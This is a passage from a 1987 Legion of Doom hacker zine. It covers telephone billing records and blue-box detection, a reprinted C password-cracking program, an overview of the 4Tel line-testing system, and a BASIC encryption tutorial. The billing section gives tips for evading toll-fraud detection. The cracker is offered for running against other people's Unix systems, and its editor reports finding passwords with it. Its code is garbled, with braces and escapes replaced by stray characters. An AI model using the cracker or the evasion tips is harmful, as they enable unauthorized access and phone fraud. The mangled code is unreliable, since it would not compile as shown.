themselves, which would probably be a slow, drawn out process. In some cases,
|
||
dialing via an alternate carrier (other then your primary one) will cause the
|
||
billing cycle to take anywhere up to three months to complete, or even more.
|
||
Another interesting note about alternate carrier dialing, some carriers do not
|
||
start billing until a specific amount of time has elapsed. This is known as
|
||
buffer-zone billing. I know of one company that uses a 45 second buffer zone,
|
||
but I am not sure what the other companies use. You can find this information
|
||
out by talking to a customer service department, however some companies CS
|
||
departments either don't know, or they do not wish to tell the customer (or
|
||
'potential' customer). With buffer zone billing (assume 45 seconds in this
|
||
case), you will be billed for the call if you let the phone ring, listen to a
|
||
busy signal, etc. if the duration of the call is greater than or equal to 45
|
||
seconds. Many of the ICs that use this type of billing do not have the
|
||
equipment to detect answer supervision, so if you can keep a conversation very
|
||
short, you may get away with a free call, without breaking any laws.
|
||
|
||
|
||
CALL CREDITING
|
||
--------------
|
||
|
||
When you receive credit for improperly placed long distance calls from an
|
||
operator or a telco business office (after you receive your phone bill)
|
||
certain things happen.
|
||
|
||
Operator crediting involves the operator entering a special flag on an AMA
|
||
tape to deduct the specific amount of given charge from the subscriber's
|
||
telephone number. I believe that this process involves (with AT&T TSPS) the KP
|
||
TRBL key, and (with NTI's TOPS) the KP TRBL and the CHG ADJ (charge adjust)
|
||
keys.
|
||
|
||
Business office crediting happens when you call the business office and
|
||
talk to a BOC 'service representative'. This person will then enter your
|
||
telephone number into a terminal, using the DOE (Direct Order Entry) system,
|
||
which is in use in my area. The billing record information comes from a
|
||
computer called CRIS (Customer Record Information System), which is accessed
|
||
by BOSS (Billing and Order Support System). BOSS has a link to computer
|
||
systems at the RAO, as this is how the customer's toll data gets to the
|
||
business office. A service representative can then pull up your toll charges
|
||
and correct them with appropriate credit entries.
|
||
|
||
|
||
SECURITY (EVERYONE READ THIS PART)
|
||
-----------------------------------
|
||
|
||
There have been several rumors going around about AMA and it's relation to
|
||
people who commit toll fraud, and I will attempt to clarify these rumors. It
|
||
is possible that a billing tape could be used to try to find out who called a
|
||
certain number at a given time. Another way AMA tapes/disks could be used as a
|
||
record of someone committing toll fraud would be if this person would happen
|
||
to be under a newer switch, such as the DMS-100, and they attempted to use a
|
||
blue box without knowing the dangers of it (I will speak only on the DMS-100
|
||
because when a older switching system is replaced with a new one, the most
|
||
common replacements are the AT&T No. 5 ESS and the Northern Telecom DMS-100
|
||
Family of switching systems). DMS-100 does indeed have the capability to
|
||
record a blue boxer's MF tones in an AMA record if the boxer doesn't know what
|
||
he is doing. 1AESS also has blue box detection features. I am not sure about
|
||
other switching systems, but I would guess that most of the newer switches
|
||
have some sort of blue box fraud detection features, of course the end user of
|
||
these switches (the telco) does not have to use them. However it is difficult
|
||
to find out if your CO uses anything of this nature unless you are a good
|
||
social engineer or have access in some way to the switch or switch output
|
||
messages and know what to look for. For instance on the Northern Telecom
|
||
DMS-100 switching system, there are a series of reports known as BLUEBOX
|
||
reports which (if in use) will inform the telco of blue boxing activity. The
|
||
DMS-100 also has AMA options that can detect certain forms of electronic toll
|
||
fraud, such as black and blue boxing. These options can be set any way the
|
||
telco wants. These AMA options can be printed on a DMS-100 switching
|
||
system,onto hardcopy terminals, or onto a data channel which may send the
|
||
Output Messages (OMs) to a telco computer system such as the Switching
|
||
Control Center System (SCCS). These options are printed in an AMA118 OM at
|
||
midnight. If an AMA option is in use by that particular switching system,
|
||
after the name of the option will be a data field that says ACTIVE. If the
|
||
option is not in use, the field will say INACTIVE. An example of an AMA118 OM
|
||
is reproduced here.
|
||
|
||
AMA118 JUL23 12:00:00 2234 INFO AMA-OPTIONS
|
||
AUDIT: ACTIVE
|
||
CALL-FWD: ACTIVE
|
||
CDAR: INACTIVE
|
||
CHG411: ACTIVE
|
||
CHG555: ACTIVE
|
||
COIN: INACTIVE
|
||
DA411: ACTIVE
|
||
ENFIA-B-C: INACTIVE
|
||
FREECALL: INACTIVE
|
||
HIGHREV: INACTIVE
|
||
INWATS: ACTIVE
|
||
LNID: INACTIVE
|
||
LOGAMA: INACTIVE
|
||
LOGOPT: ACTIVE
|
||
LONGCALL: ACTIVE
|
||
LUSORIG: INACTIVE
|
||
LUSTERM: INACTIVE
|
||
OBSERVED: INACTIVE
|
||
OCCOVFL: ACTIVE
|
||
OCCTERM: ACTIVE
|
||
OUTWATS: ACTIVE
|
||
OVERFLOW: ACTIVE
|
||
SST: ACTIVE
|
||
TIMECHANGE: ACTIVE
|
||
TRACER: ACTIVE
|
||
TRKID: INACTIVE
|
||
TWC: INACTIVE
|
||
UNANS-LOCAL: INACTIVE
|
||
UNANS-TOLL: ACTIVE
|
||
|
||
|
||
The most important ones for phreaks to know about are INWATS, LONGCALL,
|
||
SST, UNANS-LOCAL, and UNANS-TOLL. INWATS means that calls to 800 numbers are
|
||
noted in an AMA record. As far as I know, this option is a required one, at
|
||
least since Bulk Change Supplement 23 (BCS23). LONGCALL will flag long calls
|
||
in an AMA record. So if it seems to the switch that someone has been on the
|
||
phone for a long time, this will be logged. A possible use for this would be
|
||
to detect trouble conditions. This option, used in past switching systems, may
|
||
have been the cause of many blue box busts. Someone would box for several
|
||
hours using the same number (for instance, Directory Assistance) and this may
|
||
have been noted by the switch. Another way I think old time boxers may have
|
||
been nailed is from boxing off of DA. As you can see in the above listing,
|
||
there are several options that probably make AMA entries for calls to DA. If
|
||
the length of a call to DA lasts longer than a certain amount of time, the
|
||
telco could possibly detect this and attach a monitoring device upon the
|
||
suspected persons telephone line. The AMA option 'SST' may also be responsible
|
||
for blue box busts in the recent past. SST stands for Short Supervisory
|
||
Transition, and an SST is known to the phreak world as a wink. SSTs are
|
||
generated when a blue boxer seizes a trunk. The switch can detect these and
|
||
log them in an AMA record if the option is set to ACTIVE. SSTs are not solely
|
||
caused by boxers, though, as equal access offices can generate a lot of SSTs
|
||
in normal operation. I believe that trunking arrangements with ICs (InterLATA
|
||
Carriers) are often responsible for triggering these. One toll office I knew
|
||
of had thousands of SSTs on a plant measurement report, so if this option is
|
||
ACTIVE, it may not be EXTREMELY dangerous, but it can't hurt to know about
|
||
this. One possible way around the SST detect is to make your 2600Hz tone last
|
||
several seconds. I do not remember the exact figure, but after a certain
|
||
number of seconds an SST ceases to be an SST ceases to be an SST. I am not
|
||
sure if these longer transitions are logged or not, or if there is even an
|
||
option for this. However I believe that the BLUEBOX feature could not be
|
||
fooled by doing this. BLUEBOX, if activated, will detect any foreign winks
|
||
after a necessary one (necessary for call completion) occurs. Of course you
|
||
can always avoid having your DN associated with anything like this by
|
||
re-directing your call flow, which can be accomplished easily.
|
||
|
||
Another AMA option that could be used to catch black boxers is the
|
||
UNANS-TOLL option. When this option is ACTIVE, toll calls ringing longer than
|
||
a specific period of time can be logged in an AMA record. Someone calling toll
|
||
from a DMS-100 to a person using a black box (does anyone still use devices
|
||
like the black box anyway?) in a no. 5 crossbar may trigger this option to be
|
||
logged. I say 'may' because I am not positive about this, the option could
|
||
also be used in other ways, I imagine.
|
||
|
||
The ENFIA-B-C option is one that could possibly present a problem to a
|
||
telecom enthusiast. I have seen the term ENFIA (Exchange Network Features for
|
||
Interstate Access) associated with a Feature Group A (POTS dialup) long
|
||
distance service. ENFIA-B and C mean FG-B and FG-C service. FG-A and B (POTS
|
||
and 950+1/0xxx respectively) could possibly be used to record information
|
||
concerning toll fraud. For instance, I know of one service (FG-D and FG-B)
|
||
that has the ability to check a telcos' magnetic tape to see what numbers have
|
||
been accessing their service. If a large amount of fraud became a problem, the
|
||
carrier could get the AMA information to try and determine who is committing
|
||
toll fraud. I'm not sure if other companies have this option, I would guess
|
||
that almost all of the major companies (MCI, Sprint, Allnet, etc.) have the
|
||
ability to use something of this nature to track down security problems.
|
||
|
||
Have you ever wondered why many of the old blue boxers were caught? It is
|
||
due to the use of AMA. AMA records can reveal boxing patterns, and this info
|
||
can be used by the telco to track down blue/red/black box users. So if you are
|
||
a person who practices any of these methods, be aware of what you are up
|
||
against. Boxing has been around for a very long time and the telco knows all
|
||
about what goes on and the different methods that people use. So use care. An
|
||
informed phreak is a free phreak.
|
||
|
||
|
||
SUMMARY
|
||
-------
|
||
|
||
Hopefully this article has helped clear up any misconceptions about AMA
|
||
that anyone might have had, as well as provide a reference to be looked back
|
||
on. The information contained in this article can also be used for social
|
||
engineering purposes, if you so desire. However, I do not intend for any of
|
||
this information to go into harmful purposes, such as billing calls to other
|
||
people, or causing confusion and disorder at any internal points in the telco.
|
||
Such actions do not make a person a phone phreak. However, if you find out
|
||
anything interesting concerning AMA that isn't included here, or anything
|
||
about independent telcos billing systems, feel free to let me know.
|
||
|
||
If you wish to contact me concerning this article, you can find me on a
|
||
few BBS's. I will attempt to answer any questions anyone might have, and would
|
||
like to hear from anyone who has a valid interest in the workings of the phone
|
||
systems.
|
||
|
||
|
||
===============================================================================
|
||
Thanks go out to all the people (too many to mention) who have contributed any
|
||
information (no matter how small or large) to this article. Other information
|
||
for this article has been taken from switching system messages, Bell System
|
||
Technical Journals, Bell Labs RECORDs, Bellcore documents, and various other
|
||
technical literature and information. I hope someone likes this article
|
||
because it took a very long time to complete.
|
||
===============================================================================
|
||
|
||
|
||
|
||
---------------------- Shooting Shark's PW Hacker Update ---------------------
|
||
|
||
|
||
|
||
The following is a reprint of Shooting Sharks' post which he provides
|
||
another program which can be typed quickly or uploaded to the unix system of
|
||
your choice. This program can be used to ensure that the algorithm does work
|
||
and you could then proceed to upload his program from Issue #2 for more
|
||
extensive password finding. I was able to get his HPW.C program to run
|
||
perfectly, and have found quite a few passwords by having it check passwords
|
||
with dictionary entries and other files of probable passwords.
|
||
-Lex Luthor
|
||
|
||
|
||
|
||
Taken from: The Free World II 301-668-7657 BBS (no longer up)
|
||
|
||
|
||
%> When: 9-19-87 at 3:46 am
|
||
|
||
Since three people have told me my source won't compile on their system,
|
||
I've taken the suggestion and put together a *very* stripped-down version of
|
||
my HPW.C program from Issue #2. Now it's basically a 20-line engine that you
|
||
can use to verify that the algorithm does indeed work (try it with your own
|
||
password) and then add whatever bells and whistles you want (like reading
|
||
words from a file, etc.) The version presented here just prompts the user
|
||
for the encrypted password string, and then goes into an endless loop where it
|
||
reads a password attempt from the keyboard, encrypts and compares it, and
|
||
tells the user if it's the correct password. It calls no external routines
|
||
besides crypt(), printf(), scanf(), strcmp() and exit(). crypt() is
|
||
absolutely essential to the program, and the rest are defined in K&R so this
|
||
program had *better* work on your unix system!
|
||
|
||
Here it is. Sorry for the hassles the old version gave anybody although
|
||
some people were able to get it to run quite nicely.
|
||
|
||
|
||
- - - - - - - - - - - - - - - - - cut here - - - - - - - - - - - - - - - - - -
|
||
|
||
int len;
|
||
|
||
char crbuf[30], *crypt(), *pw, pwbuf[10];
|
||
|
||
main()
|
||
$
|
||
|
||
|
||
printf("first, carefully type the ENCRYPTED password string:Xn>");
|
||
scanf("%s",crbuf);
|
||
printf("Now, type a password attempt at the prompt. type QUITXn");
|
||
printf("(yes, in caps) on a blank line to quit...XnXn");
|
||
for (;;) $
|
||
printf("try >");
|
||
scanf("%s",pwbuf);
|
||
if (!strcmp(pwbuf,"QUIT"))
|
||
break;
|
||
pw = crypt(pwbuf,crbuf);
|
||
if (!strcmp(pw,crbuf)) $
|
||
printf(" ==> %s is correct.Xn",pwbuf);
|
||
exit(0);
|
||
|
||
|
||
printf("done.Xn");
|
||
|
||
|
||
- - - - - - - - - - - - - - - - - cut here - - - - - - - - - - - - - - - - - -
|
||
|
||
|
||
The LOD/H Technical Journal, Issue #3: File 05 of 11
|
||
|
||
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
|
||
(L) (L)
|
||
(O) An Overview of the Teradyne 4Tel System (O)
|
||
(D) (D)
|
||
(+) by (+)
|
||
(+) (+)
|
||
(+) Doom Prophet (+)
|
||
(L) (L)
|
||
(O) Legion of Doom/Hackers! (O)
|
||
(H) (H)
|
||
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
|
||
|
||
|
||
|
||
4TEL is a loop testing system mainly used by General Telephone (GTE) that
|
||
consists of a Voice Response System and a Craft Dispatch Section as well as
|
||
the facilities and equipment used for testing functions. The following text
|
||
will attempt to dispell many of the 4TEL myths that have been created in the
|
||
past years, such as the idea that it can be used to eavesdrop on lines within
|
||
its serving area. The information provided has been gained from company
|
||
publications and from personal experience. A 4TEL is not the same thing as a
|
||
REMOBS, which stands for REmote service OBservation System.
|
||
|
||
|
||
|
||
The portion of the system that some of the phreak/hack population is
|
||
familiar with is the Voice Response System, which has normal POTS dialups.
|
||
This system greets the user with an announcement message and then asks for a
|
||
password, which is entered in DTMF tones. The legitimate use of these dialups
|
||
are for outside craft personnel (linemen) to call in, perform tests and
|
||
receive the results for subscribers' lines. The VRS is provided so craft
|
||
personnel can access the 4TEL system at times when no one is at the testboard
|
||
(at nights or weekends). Through the VRS, up to 8 craft/technicians can access
|
||
4TEL at the same time, enabling them to get more done in a smaller amount of
|
||
time.
|
||
|
||
|
||
|
||
After a password has been accepted by the system, the electronic voice
|
||
will ask for the line number that the user wishes to be tested. The number
|
||
entered will be read back to ensure correct entry. The system will then ask
|
||
for the user to enter the mode. The modes are:
|
||
|
||
|
||
1: Calling on other line
|
||
2: Calling on test line
|
||
3: Line test results
|
||
|
||
|
||
It is possible on some VRS's to get a listing of the modes by dialing 0
|
||
when the voice prompts. Line tests are possible from both modes 1 and 2 by
|
||
dialing the octothorpe (#) key. The results of the test will be announced
|
||
along with the length of the cable in miles. Bridged ringers, if any, will
|
||
also be noted. Mode 3, the line test results section, will tell the user there
|
||
are no test results available unless they have beeen previously entered. The 7
|
||
key is the monitor command from both test modes. If there is speech on the
|
||
line, it will be detected electronically but will NOT be heard by the user.
|
||
The monitor command is not 'REMOBS' (Remote Observation) but a method of
|
||
determining if the line is busy due to normal means (conversation) or due to
|
||
some trouble condition at the switch. When the system asks for the ID code for
|
||
a monitor command, the system will accept the line number as well as the
|
||
initial password, and even a secondary password before dialing, but it has not
|
||
been determined by the author if this is a standard for every 4TEL. Not just
|
||
anything will work for the monitor password however as it will announce if the
|
||
ID code entered is invalid or not.
|
||
|
||
|
||
If mode 1 is entered, these commands are available:
|
||
|
||
|
||
MODE ONE COMMANDS:
|
||
|
||
|
||
1-Fault location
|
||
2-Other Testing
|
||
7-Test OK, monitor
|
||
8-Hang up
|
||
9-Enter next line number
|
||
|
||
|
||
If option 7 is chosen, another menu will be available if the line tests
|
||
busy.
|
||
|
||
|
||
2-Monitor test
|
||
3-Overide and test
|
||
4-Wait for idle
|
||
|
||
|
||
If suboption one (Fault location), mode one, is chosen, these commands are
|
||
available:
|
||
|
||
|
||
1-Open location
|
||
3-Short location
|
||
4-Cross location
|
||
5-Ground location
|
||
8-Hang up
|
||
|
||
|
||
If suboption two (Other testing), mode one, is chosen, these commands are
|
||
available:
|
||
|
||
|
||
2-Loop ground Ohms
|
||
3-Dial tone test
|
||
4-Pair ID
|
||
8-Hang up
|
||
|
||
|
||
|
||
MODE TWO COMMANDS:
|
||
|
||
|
||
2-Other testing
|
||
7-Test OK, monitor
|
||
8-Hang up
|
||
9-Enter next line number
|
||
|
||
|
||
If suboption 2 (Other testing), mode two, is selected, these commands are
|
||
available:
|
||
|
||
|
||
2-Loop ground Ohms
|
||
8-Hang up
|
||
|
||
|
||
|
||
The 4TEL system's main use is for standard testing, which is done nightly
|
||
upon every line in an exchange. This locates faults and problems before they
|
||
have to be reported by customers. All lines that have trouble detected upon
|
||
them are printed out in a report at the repair center the next morning where
|
||
the proper fault location and dispatching can be done. The measurement and
|
||
test unit of the 4TEL system is called a COLT, Central Office Line Tester,
|
||
which performs all nightly and on demand testsupon the exchange through local
|
||
test trunks.
|
||
|
||
|
||
There are a few different types of COLTs. The standard version will serve
|
||
any CO for up to 10,000 subscribers. The COLT RS is used in rural step by step
|
||
offices (referred to as 'steppers' also) for up to 1,300 lines. The Digital
|
||
COLT is used for digital Central Offices. These can have remote Colt
|
||
Measurement Units (CMU's) for remote switches which are controlled by the Colt
|
||
Computer Unit (CCU) at the host switch. The CMU speed calls the CCU at night
|
||
to start the testing and direct the operations. The CMUs in regular end
|
||
offices have digital links (over the normal telephone network) with the SAC,
|
||
which is how the line test results are distributed to the repair center.
|
||
|
||
|
||
|
||
The 4TEL system can also test lines upon command by a human operator at
|
||
the SAC (Service Area Computer). The CRT operator enters the line number in
|
||
the proper field and 4TEL runs a full series of tests as well as displaying
|
||
past line history, fault summary, volts and current information, and the cable
|
||
length. The results of the testing are displayed in plain english, as opposed
|
||
to decimal or other format, on the screen. A dispatch decision is also
|
||
displayed after every line test to determine if a dispatch is needed.
|
||
|
||
|
||
SAC's
|
||
-----
|
||
|
||
|
||
The SAC is the centralized focal point for 4TEL control and reporting.
|
||
This computer is located in the repair center and distributes test/work
|
||
information between CRT's and COLT's. The SAC formats the results of routine
|
||
testing into a daily advisory report as mentioned earlier.
|
||
|
||
|
||
|
||
There are several types of 4TEL reports that are worth noting. The
|
||
DISPATCH report lists troubles that can have an immediate dispatch for them.
|
||
These also tell the location of the fault (cable, CO, station, etc.) and are
|
||
classified into two types, moderate and severe, relating to how service
|
||
affecting the problem may be. The CABLE report lists all new cable faults. A
|
||
Plant Status report summarizes the condition of the outside plant and totals
|
||
them per individual exchange. In these reports, trouble conditions can be
|
||
listed in a variety of ways. CROSSES and WETS refer to line insulation faults
|
||
and may indicate water penetration of the cable. SHORTS and GROUNDS are
|
||
insulation faults at the station set. OPENS refer to a broken, or 'open' Ring
|
||
or Tip lead in a Cable Pair. BACKGROUND refers to electrical noise caused by
|
||
power lines being nearby. ABNORMAL VOLTAGE indicates high voltage conditions.
|
||
There are others, but the reader will hopefully get the idea from the ones
|
||
listed above.
|
||
|
||
|
||
CDS
|
||
---
|
||
|
||
|
||
Another major part of the 4TEL system is the Craft Dispatch System, which
|
||
is a DTMF and speech response setup used to exchange report and schedule
|
||
information between the repair center staff and outside craftspersons. Linemen
|
||
call in to get dispatch information that has been previously entered by the
|
||
dispatcher. CDS plays back the info one field at a time. When the craft
|
||
personnel is ready to receive the next field of information, he simply says
|
||
'Go' and the system continues. A printer at the repair center informs the
|
||
dispatcher when a craftsperson has received a report. When the trouble is
|
||
taken care of, a completion report is done on the CDS in which it asks for the
|
||
closeout and schedule one field at a time to be entered in DTMF and in speech.
|
||
The clerk at the repair center then closes the trouble on the SAC/4TEL system
|
||
after the line is tested a final time to ensure proper operation.
|
||
|
||
|
||
CDS may also have audit trails of every transaction for a certain time
|
||
period. So to summarize the work flow for involving the CDS: Irate customer
|
||
calls the clerk at the repair center. The information is forwarded to the
|
||
dispatcher who enters it into CDS. Craft personnel call in and receive the
|
||
messages, do the required work, then file a completion report. The clerk then
|
||
closes out the trouble in SAC/4TEL.
|
||
|
||
|
||
The Digital Concentrator Measurement Unit is another component of the 4TEL
|
||
testing equipment that is used to test lines in digital concentrators such as
|
||
the GTE MXU and the NTI-OPM. They are located inside Digital Loop Carrier
|
||
system remote terminals or huts and consist of a circuit board and measuring
|
||
system. It provides AC and DC measurements of subscriber loops, as well as all
|
||
the normal test/measurement functions such as fault description and location ,
|
||
dispatch messages, and special tests. The DCMU can test the lines of an
|
||
individual DLC remote terminal, or a group of terminals that are located
|
||
together. The capacity of terminals that the DCMU can test is determined by
|
||
analysis of test traffic and economic factors as well. Both the CRT at the SAC
|
||
and the VRS are compatible with the DCMU. These units are self calibrating,
|
||
unlike the PMU's of an LMOS supported Loop Testing System. The 4TEL CCU is
|
||
linked to the DCMU via either a 1200 baud dial up or a dedicated link,
|
||
depending upon the size of the office.
|
||
|
||
|
||
|
||
Some of the tests that 4TEL performs are loop and ground resistance (which
|
||
detects resistance faults and sheath ground problems), dial tone test (in
|
||
which the number of times dial tone can be drawn during a certain period is
|
||
recorded) , busy line monitoring (not BLV or REMOBS), coin station tests
|
||
(totalizer, coin relay, etc), as well as all the standard tests which were
|
||
covered above. A pair identification can also be done, in which a tone is
|
||
placed on the pair to help those at terminal cabinets locate that specific
|
||
one, similar to the LMOS/MLT tone applique function.
|
||
|
||
|
||
|
||
Miscellaneous notes
|
||
-------------------
|
||
|
||
|
||
If a user enters the number of the 4TEL system they have dialed in upon,
|
||
the system will announce an intercept. A user cannot monitor/test Directory
|
||
Assistance through 4TEL. Lines that are out of the system's NPA can be tested
|
||
also, but a 1 has to be dialed before the number just like an ordinary toll
|
||
call. The 4TEL VRS will give the user a 'beep' tone after a few seconds of
|
||
waiting for input. If the user doesn't enter anything, the VRS will
|
||
disconnect. A version of 4TEL is also used by Rochester Telephone in New
|
||
York, and there may be other independent companies that use the system. Try
|
||
to find out what system you're served by. If you're in a Bell area, it will
|
||
most likely not be 4TEL, but LMOS.
|
||
|
||
|
||
|
||
I hope that this article has helped readers to better understand the way the
|
||
4TEL system operates. Again, there may be some differences depending upon the
|
||
area and the company. Thanks go to Taran King, Phantom Phreaker, and Lucifer
|
||
666 for supplying information in one way or another that contributed to this
|
||
file.
|
||
|
||
|
||
Doom Prophet/LOD
|
||
The LOD/H Technical Journal, Issue #3: File 06 of 11
|
||
|
||
|||||||||||||||||||||||||||||||||||||||||||||||||||
|
||
+-+-+-+-+-+-+/ X+-+-+-+-+-+-+
|
||
X L X Secure Data Encryption with Cellular Automatons / L /
|
||
X O X / O /
|
||
X D X by / D /
|
||
+-+-+-+ +-+-+-+
|
||
X L X The Mentor / L /
|
||
X O X / O /
|
||
X H X A Legion of Doom Presentation! / H /
|
||
|
||
+-+-+-+ +-+-+-+
|
||
X_X_X_X_________________________________/_/_/_/
|
||
|
||
|
||
One of the key issues that concerns anyone who has sensitive or illegal
|
||
information on their computer system is preventing unauthorized access to this
|
||
information. Even if you hit a key that deletes everything on the hard disk
|
||
when you see that four-door sedan pull up in the driveway, any idiot with
|
||
Norton's Utilities (IBM) or Copy II+ (Apple) can recover anything that's on
|
||
your drive with minimal effort. A delete command only changes a flag in the
|
||
VTOC (volume table of contents), it doesn't actually *remove* the file from
|
||
your system.
|
||
There are two methods to ensure that your data can't be read by a sector
|
||
editor or recovered by NU. The first is to overwrite everything with a NULL
|
||
(FF) or anything else for that matter. I've seen one batch file that does a
|
||
global delete, creates a file that says 'EAT HOT DEATH', and then begins
|
||
copying it until disk space is full. Unfortunately, you can't always guarantee
|
||
that you will be able to get to your computer before someone else does.
|
||
The second method is to encrypt your data. Most people have visions of
|
||
data encryption being some sort of arcane process akin to summoning demons or
|
||
talking with Dead Cow Cult members (two closely related process- es.) In
|
||
practice, it isn't that difficult. This file is intended to show some very
|
||
short programs that will encrypt data beyond the ability of any- thing short of
|
||
a dedicated mainframe to crack.
|
||
|
||
How to use: The code examples I provide will be in MicroSoft's
|
||
AmigaBASIC. It is fairly generic and you should be able to convert it over to
|
||
IBM, //e,c,gs, Mac, ST, C64, or any flavor of mainframe you like. For those of
|
||
you setting up systems on Packet-Switched Networks (such as the LOD/H system
|
||
one of our members is implementing) data encryption should be considered
|
||
absolutely necessary to maintain security.
|
||
The terseness of the routines make them easy to insert in a bulletin
|
||
board also, although conversion into C or Assembly would be necessary for
|
||
decent speed.
|
||
|
||
Intro to Cryptography: Long before computers were around, there was a
|
||
need for data security. Everyone used lemon juice as 'invisible ink' when they
|
||
were a kid, heating it over a candle to bring it out. And everyone has seen
|
||
the substitution code where "A" = 1, B = "2", "Z" = 26, etc...
|
||
The easiest form of encryption involves a variation of the previous.
|
||
First of all, don't think of A = 1 as a substitution, think of it as a
|
||
remapping. Let's say we have a language made up of the five vowels, and we
|
||
wanted to remap them to the numbers 1-5. Our map would look like this:
|
||
"AEIOU12345" and our mapping function would be f(c) = POSITION(c) + x where c =
|
||
the letter to map and x is the key (in this case 5.) So every time we needed
|
||
to encrypt a letter, we would take its position in the map, add 5 to it, and
|
||
come up with the character to substitute. For the entire alphabet, the mapping
|
||
function would be f(c) = POS(c) + 26 for the map "A..Z,1..26".
|
||
Your map should be composed of all the characters that will be used for
|
||
encryption. In a text only encrypter, this will consist of all the printable
|
||
characters your machine can use. The same method can be used to encrypt binary
|
||
files, but it's not as clear as text only for a teaching example.
|
||
The problem with this simple form of encryption is that your average C64
|
||
could crack it in a matter of minutes. Enter into the next level of
|
||
cryptography, random numbers.
|
||
During World War II the Allied Forces created a system to generate
|
||
random electric noise, recorded this noise onto a wax cylinder, and scram- bled
|
||
radio transmissions by mixing the seemingly random noise with the voice
|
||
transmission. The soldiers in the field needed an imprint of the same cylinder
|
||
to be able to understand the message. Think of the wax cy- linder as a
|
||
'filter' for the crypted message.
|
||
A random number generator can be easily used to encrypt data providing
|
||
you realize the following- a random number generator on a computer is not
|
||
really random. If you initialize the generator with the same seed value on two
|
||
seperate occasions, it will return the same sequence of psuedo- random
|
||
numbers. Most BASIC's use the RANDOMIZE <seed> command to start the generator
|
||
off. If you leave off the seed, they get a seed from the system clock or some
|
||
other fairly random source, providing a much truer random selection. But by
|
||
declaring the seed yourself, you can be sure that you will be able to reference
|
||
this same string of numbers, a string that is very hard to figure out without
|
||
the key (seed.)
|
||
Program Listing 1 is an example of a BASIC encrypt/decrypt system that
|
||
uses the built-in random number generator include on the machine (or language
|
||
implementation.)
|
||
|
||
Program Listing 1
|
||
-----------------
|
||
|
||
REM ************************************************************************
|
||
REM
|
||
REM Ok, this is an example of very basic encryption. It takes the input
|
||
REM string and the input key and processes them using the machine's built
|
||
REM in random number generator. This version is written in AmigaBASIC 1.2.
|
||
REM It can be compacted quite a bit by writting it in C, but it's an easy
|
||
REM algorithm to crack.
|
||
REM
|
||
REM ************************************************************************
|
||
|
||
INPUT "String to be encoded"; C$
|
||
INPUT "Key Please! ";K
|
||
|
||
|
||
REM ************************************************************************
|
||
REM
|
||
REM When you use the RANDOMIZE command, it seeds the random number gener-
|
||
REM ator with the key K. *EVERY* time you seed the generator with the same
|
||
REM value, you will get the same sequence of psuedo-random numbers. Since
|
||
REM the built in random-number generator uses a linear algorithm to gener-
|
||
REM ate the sequence, it's easy (relatively) to crack.
|
||
REM
|
||
REM ************************************************************************
|
||
|
||
RANDOMIZE K
|
||
|
||
REM ************************************************************************
|
||
REM
|
||
REM The only difference between encoding and decoding is which way you
|
||
REM move in your Q$ array space. Encoding takes the original and shifts
|
||
REM to the right, decoding takes the codes value and shifts to the left.
|
||
REM
|
||
REM ************************************************************************
|
||
|
||
REREAD:
|
||
INPUT "Encode or Decode ? ";A$
|
||
A$=LEFT$(A$,1)
|
||
IF A$="E" OR A$="e" THEN
|
||
A=1
|
||
GOTO HEAD
|
||
END IF
|
||
IF A$="D" OR A$="d" THEN
|
||
A=-1
|
||
ELSE
|
||
GOTO REREAD
|
||
END IF
|
||
|
||
REM ************************************************************************
|
||
REM
|
||
REM Q$ contains all the characters that can be encoded. Every encoded
|
||
REM character will be mapped to a character in this array. I haven't
|
||
REM included any non-standard characters, so you will have to customize
|
||
REM it to your particular keyboard/system. I've included an error check
|
||
REM that will abort the encryption if it encounters a character that isn't
|
||
REM in Q$. I have to use the STRING$ command to insert the spacebar and
|
||
REM the quote into the string. It could also be done with a ASC(##) in
|
||
REM many basics. You could expand this to include any non-printable
|
||
REM characters you'd like so you could do non-text files.
|
||
REM
|
||
REM ************************************************************************
|
||
|
||
HEAD:
|
||
SPACE = 32
|
||
QUOTE = 34
|
||
Q$="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
|
||
Q$=Q$+"1234567890!@#$%^&*()-=_+[]$;:'.,<>/?X|D"
|
||
Q$=Q$+STRING$(1,SPACE)+STRING$(1,QUOTE)
|
||
QSIZ = LEN(Q$)
|
||
|
||
REM ************************************************************************
|
||
REM
|
||
REM This is the main loop. L = length of the string to encrypt. In this
|
||
REM example, I am only encrypting a single string. Most people who will
|
||
REM actually use this will change the FOR loop to run until an EOF is
|
||
REM encountered in the input file. Since the syntax for that will vary
|
||
REM widely from system to system, I'll leave it out.
|
||
REM
|
||
REM ************************************************************************
|
||
|
||
L=LEN(C$)
|
||
FOR I = 1 TO L
|
||
|
||
REM /* Finds the character I in the input string */
|
||
X$ = MID$(C$,I,1)
|
||
|
||
REM /* Finds the integer location of the character in Q$
|
||
REM returns variable POZ */
|
||
GOSUB LOKPOZ
|
||
|
||
REM /* RND returns a random # between 0 and 1. Multiply it by the
|
||
REM size of array Q$ and you get the number of positions to move
|
||
REM when encoding or decoding. */
|
||
POZMV = (RND * QSIZ)
|
||
|
||
REM /* If you are encoding, you will shift to the right using addition.
|
||
REM you take the modula base QSIZ to keep the new character within
|
||
REM the bounds of Q$. */
|
||
IF A = 1 THEN
|
||
NUPOZ = (POZ + POZMV) MOD QSIZ
|
||
ELSE
|
||
REM /* Otherwise, you subtract, which takes a bit more math to keep
|
||
REM up with. Once you have the distance to shift, you must
|
||
REM convert it to a positive integer and then subtract two to
|
||
REM account for the head & tail of the array. */
|
||
NUPOZ = (POZ - POZMV) MOD QSIZ
|
||
NUPOZ = NUPOZ -2
|
||
IF NUPOZ < 1 THEN
|
||
NUPOZ = QSIZ - ABS(NUPOZ)
|
||
END IF
|
||
END IF
|
||
|
||
REM /* Now you assign the new character in array Q$ to Y$, and append
|
||
REM it to your converted string */
|
||
IF NUPOZ < 1 THEN
|
||
NUPOZ = QSIZ - ABS(NUPOZ)
|
||
END IF
|
||
Y$ = MID$(Q$,NUPOZ,1)
|
||
D$ = D$ + Y$
|
||
NEXT I
|
||
|
||
PRINT "Original = ";C$
|
||
PRINT "Modified = ";D$
|
||
END
|
||
|
||
REM /* This finds character X$ in array Q$ and returns an integer
|
||
REM value of the location. Called from the main loop. */
|
||
LOKPOZ:
|
||
FOUND = 0
|
||
POZ = 1
|
||
TOP:
|
||
IF FOUND = 1 THEN
|
||
RETURN
|
||
ELSE
|
||
TMP$ = MID$(Q$,POZ,1)
|
||
